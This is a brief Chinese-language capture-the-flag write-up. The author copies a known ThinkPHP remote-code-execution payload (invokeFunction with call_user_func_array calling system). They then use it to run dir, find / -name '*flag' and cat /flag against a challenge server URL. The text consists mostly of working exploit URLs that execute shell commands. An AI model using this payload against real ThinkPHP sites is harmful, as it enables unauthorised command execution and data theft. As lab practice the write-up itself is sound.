百度一下thinkphp,找到几个get传参的webshell漏洞,直接cv过来一个个试
s=index/think\App/invokeFunction&fun
ction=call_user_func_array&vars[0]=sys
tem&vars[1][]=命令
先试试dir来查看包含的文件
没有看见我们喜闻乐见的flag.txt,又不想一个个file的找,那就现学现卖一个新命令直接去找flag文件
s=index/think\App/invokeFunction&fun
ction=call_user_func_array&vars[0]=sys
tem&vars[1][]=find / -name "*flag"
找到我们需要的flag文件,这时候我手贱了一下输入\s查看上级文件
/index.php?s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20"*flag"\s
嘛,有点多东西返回返回
我们直接用cat去看flag文件
http://111.200.241.244:60692/index.php?s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag
得到flag,记得cat后面加空格。